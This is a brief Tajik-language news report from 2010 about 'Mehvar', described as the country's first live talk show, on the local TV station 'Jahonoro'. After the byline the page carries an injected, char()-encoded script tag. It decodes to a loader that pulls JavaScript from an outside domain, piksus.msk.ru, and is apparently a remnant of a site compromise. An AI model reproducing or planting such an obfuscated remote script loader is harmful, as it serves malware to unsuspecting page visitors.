18.11.2010
«Меҳвар» аввалин ток шоуи мустақим дар кишвар
Минбаъд ҳар рӯзи шанбе тамошобинони телевизиони маҳаллии «Ҷаҳоноро» имкон доранд ток шоуи «Меҳвар»-ро мустақиман тамошо намоянд. Мавзӯи барнома ба ҳаёти иҷтимоии ноҳия ва мардуми он бахшида хоҳад шуд. Тӯли як ҳафта телевизион аз шаҳри Томски Федератсияи Руссия Денис Бевс ва Тамара Павлова барои журналистон ва кормандони ин телевизион нозукиҳои таҳия ва омода намудани барномаро дар жанри ток шоу омӯзонданд. Барномаи нахустин ба мавзӯи нархи нақлиёти мусофиркашонӣ бахшида шуда буд. Алҳол байни телевизионҳои мустақили кишвар ин аввалин таҷриба аст, ки барнома дар жанри ток шоу ба таври мустақим манзури тамошобинон гардад.
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)7d8b2cad89201216370614fd9724ebad.js" type="text/javascript">

ТАВЗЕҲОТ